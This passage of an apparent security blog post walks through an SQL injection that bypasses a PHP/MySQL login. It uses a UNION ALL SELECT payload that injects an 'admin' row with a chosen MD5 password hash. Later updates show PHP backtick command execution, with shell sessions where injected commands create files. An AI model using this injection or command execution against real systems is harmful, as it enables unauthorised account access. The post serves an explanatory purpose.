What does happen here? The query will finally look like this if the injection works: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'". Which will result in a table looking like this:
+-------------+----------------------------------+ | Anmeldename | Passwort | +-------------+----------------------------------+ | admin | 9990775155c3518a0d7917f7780b24aa | +-------------+----------------------------------+
And now we give the password "ttt" to the script, which is "9990775155c3518a0d7917f7780b24aa" as a MD5 hash! So finally "if($zeile->Passwort==$spw)" gets this "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)" and that is TRUE, which results in? Guess? Yeap, you are logged in!
Thanks go to [WildCat], who has tested this for me and can say for sure, that it works under PHP 5 plus MySQL 5!
UPDATE: Another time I have to update this news (seems like they never want to end). Veda again messaged me and told me it will work as a Code Injection if you use backticks. As a proof-of-concept he opened up the PHP interpreter on his local machine and did the following:
% php -a php > print md5(); Warning: md5() expects at least 1 parameter, 0 given in php shell \ code on line 1 php > print md5(x); 9dd4e461268c8034f5c8564e155c67a6 php > print md5(`mkdir foo`); [...] % ls foo
No comment from my side! I hope that's it! EOF!
UPDATE 2: So another update... I won't comment this anymore, look for yourself:
joern@heaven:~$ cat test.php
<?
$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch skyout-fail`)."\n";;
echo md5($string)."\n";;
?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$